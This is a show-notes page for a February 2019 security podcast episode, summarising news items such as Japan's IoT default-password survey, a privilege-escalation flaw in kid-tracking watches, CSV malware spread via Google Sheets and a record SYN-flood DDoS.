IOT, DDOS, ICS security

Japan, Imperva, & DDoS – Paul’s Security Weekly #592

February 1, 2019



In the Security News, 5 tips for access control from an ethical hacker, Japan is to hunt down Citizens insecure IoT devices, kid tracking watches allow attackers to monitor real time location data, and Imperva mitigate a DDoS attack generated 500 million packets per second!

Paul's Stories

  1. 5 Tips for Access Control Cybersecurity from an Ethical Hacker - Not all that different from security tips for your "regular" IT infrastructure: No Default Passwords – Take them out, everywhere. They’re in the documentation, they’re easy to find on the internet and the script to compromise them is easy to write. Keep Testing – Not interoperability testing. As a hacker, it doesn’t matter if you can integrate with different equipment. These devices need to be locked down, with strong passwords and proper equipment. If you don’t have the right staff, it’s alright. You can hire a consultant for what you need, and be safe moving forward with your typical staff once they leave. Vulnerability Tracking and Reporting – If you don’t have a process for this, there are many resources on the IT side on how to do this. You don’t have to reinvent the wheel. There will be vulnerabilities in everything — there is no shame in reporting them, but there is shame in keeping quiet about them. Know Your Hardware’s Software – A lot of hardware platforms ride on code from something else. Your engineer didn’t write them, they’re open source or free. The problem with this — although it saves you money on development — it also means you inherit the vulnerabilities from the code the engineer borrowed. Update Awareness Programs – If they’re the same slides you’ve made your employees look at every year, update them. Employees are your biggest vulnerability. They will be targeted. If you don’t properly train them, they will pose a risk to your organization regardless of what you do with the technology.
  2. Ready for DNS Flag Day? - Security Boulevard - The minimal working setup which will allow your domain to survive 2019 DNS flag day must not have a timeout result in any of the plain DNS and EDNS version 0 tests implemented in the ednscomp tool. Failures of the EDNS(1) tests will not cause any immediate problem.
  3. Cheating Attempts and the OSCP - When most people think of cheating, they think of having an answer sheet. Most often, individuals resort to buying the answers from someone else and just apply them to the exam. When this happens, we have a series of controls to deal with it. The other, less thought about, type of cheating is individuals simply claiming that they have the certification when they don’t. This one is easier to deal with as individuals just need to validate the certification. Last year, we rolled out our Acclaim Digital Badges, which have been very well received in the community. We also have a documented process on how to work directly with us to validate certifications.
  4. The Problem with Throwing Away a Smart Device Hackster Blog - In a very short space of time the teardown established that if you’ve connected the bulb to your Wi-Fi network then your network password will be stored in plain text on the bulb, and can be easily recovered just by downloading the firmware and inspecting it using a hex editor.
  5. Japan to Hunt Down Citizens Insecure IoT Devices - The country’s National Institute of Information and Communications Technology (NICT) has been tasked by the Ministry of Internal Affairs and Communications to carry out a “survey” of 200 million deployed IoT devices, starting with routers and web cams. A team of NICT white-hats will try to log into internet-discoverable devices using default credentials and a list of overused and easy-to-guess passwords. When insecure devices are uncovered, ISPs and local authorities will be notified, so they can work with impacted consumers and businesses to lock them down.
  6. Kid-Tracking Watches Allow Attackers to Monitor Real-Time Location Data - This was much worse than I tought: At issue was an easy-to-exploit, severe privilege-escalation vulnerability: The system failed to validate that the user had the appropriate permission to take admin control. An attacker with access to the watch’s credentials simply needed to change the user level parameter in the backend to an admin designation, which would provide access to all account information and all watch information. gator tracking watchMore specifically, the Gator works with a web login panel. Using a simple web proxy, the Pen Test Partners team was able to review requests being sent to the website – which included a “User[Grade]” parameter. Stykas simply guessed that this designates the level of privilege for the user and decided to play around with it. “I changed the value to two and nothing happened, BUT change it to zero and you get platform admin,” he said.
  7. Prepare to Defend Your Network Against Swarm-as-a-Service - For example, a new methodology was announced by scientists in Hong Kong that uses natural swarm behaviors to control clusters of nano-robots. These micro-swarms can be directed to perform precise structural changes with a high degree of reconfigurability, such as extending, shrinking, splitting and merging. Lots of hype in this one, but I can't help but think about Black Mirror.
  8. Exclusive: spreading CSV Malware via Google Sheets - Interesting as using Google Sheets to share it bypasses many protections: Finally an attacker could send a clear link over an instant message platform and/or over eMail asking to open up a Google Sheets suggesting to the victim to open the spreadsheet locally since “MSExcel compatibility issues”. At that time if the victim downloads the Google sheets and opens up locally (with Microsoft), the attacker might infect her box. Also, the ability to execute DDE in a .csv is interesting.
  9. Researchers published the PoC exploit code for Linux SystemD bugs - Nick and the team at Capsule8 are awesome, check out their blog for the PoC code that Qualys didn't publish!
  10. Imperva mitigated DDoS attack generated 500 Million Packets per Second, the largest ever - Earlier this month, the cyber security software and services company Imperva mitigated an attack against one of its clients that exceeded 500 million packets per second. This attack was a SYN flood DDoS and it is the largest DDoS attack by packet volume ever observed.
  11. New Mac malware steals cookies, cryptocurrency and computing power - Help Net Security
  12. 8 Cybersecurity Myths Debunked - Myth 1: You're Too Small to Be Attacked Myth 2: Passwords Are Good Enough Myth 3: Antivirus Is Good Enough Myth 4: It's IT's Problem Myth 5: BYOD is Safe Myth 6: Total Security Is Possible Myth 7: You Don't Need Assessments and Tests Myth 8: Threats Are Only External
  13. Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory

Lee's Stories

  1. FaceTime Group Chat bug allows evesdropping Apple disabled group chat, fix due this week - will it be server or client and how to test.
  2. Tool to find vulnerable robots released The tool, "Aztarna" written in python, detects vulnerable robots (and routers) connected to the internet. This is here because robots.
  3. MS Terminates support for IE 10 IE 10 and Windows 7 now have 2020 termination dates.
  4. Most Fortune 100 companies still using vulnerable struts versions Same vulnerable version as Equifax used. Learning from others misfortune is important.
  5. IoT functions added to Balboa Water Group Hot Tubs without security Tub uses open hotspot, shared cloud account and an ID for management derived from hotspot MAC address. Hacker could locate the SSID, change water temperature, and detect jet state to determine when in use.

Full Show Notes

Follow us on Twitter:


[caption id="attachment_210" align="alignleft" width="120"]Paul Asadorian Paul Asadorian - CEO, Security Weekly.[/caption]


[caption id="attachment_210" align="alignleft" width="120"]Jeff Man Jeff Man - Sr. InfoSec Consultant, Online Business Systems.[/caption]


[caption id="attachment_210" align="alignleft" width="120"]Lee Neely Lee Neely - Senior Cyber Analyst , Lawrence Livermore National Laboratory.[/caption]








  • RSA Conference 2019 is coming up March 4 - 8 in San Francisco! Go to to register now using the discount code 5U9SWFD to receive $100 off a full conference pass! If you are interested in booking an interview or briefing with Security Weekly, please go to to submit your request!
  • Join us April 1-3, at Disney's Contemporary Resort for InfoSec World 2019 where you can connect and network with like-minded individuals in search of actionable information. Visit and use the registration code OS19-SECWEEK for 15% off the Main Conference or World Pass. If you are interested in booking an interview or briefing with Security Weekly, please go to to submit your request!


[audio src="" ]

prestitial ad